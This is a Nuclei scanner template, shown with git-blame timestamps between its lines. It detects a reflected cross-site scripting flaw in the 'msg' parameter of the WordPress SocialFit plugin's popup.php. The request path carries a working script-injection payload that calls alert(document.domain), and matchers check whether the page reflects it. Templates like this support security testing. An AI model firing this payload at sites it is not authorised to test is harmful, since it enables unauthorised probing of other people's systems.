2021-07-11 00:41:04 +00:00
id : wp-socialfit-xss
info :
2022-07-29 14:04:23 +00:00
name : WordPress SocialFit - Cross-Site Scripting
2021-07-11 00:41:04 +00:00
author : daffainfo
2022-08-29 20:21:30 +00:00
severity : high
2021-07-11 00:41:04 +00:00
description : |
2022-07-29 14:04:23 +00:00
WordPress SocialFit is vulnerable to a cross-site scripting vulnerability via the 'msg' parameter because it fails to properly sanitize user-supplied input.
2021-08-18 11:37:49 +00:00
reference :
2021-07-11 00:41:04 +00:00
- https://www.exploit-db.com/exploits/37481
2022-07-29 14:04:23 +00:00
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
cvss-score : 7.2
cwe-id : CWE-79
2022-08-27 04:41:18 +00:00
tags : wordpress,xss,wp-plugin,edb
2023-04-28 08:11:21 +00:00
metadata :
max-request : 1
2021-07-11 00:41:04 +00:00
2023-04-27 04:28:59 +00:00
http :
2021-07-11 00:41:04 +00:00
- method : GET
path :
2021-07-19 06:13:07 +00:00
- '{{BaseURL}}/wp-content/plugins/socialfit/popup.php?service=googleplus&msg=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
2021-07-11 00:41:04 +00:00
matchers-condition : and
matchers :
- type : word
part : body
words :
2021-07-19 06:13:07 +00:00
- '</script><script>alert(document.domain)</script>'
2021-07-11 00:41:04 +00:00
- type : word
part : header
words :
- "text/html"
- type : status
status :
- 200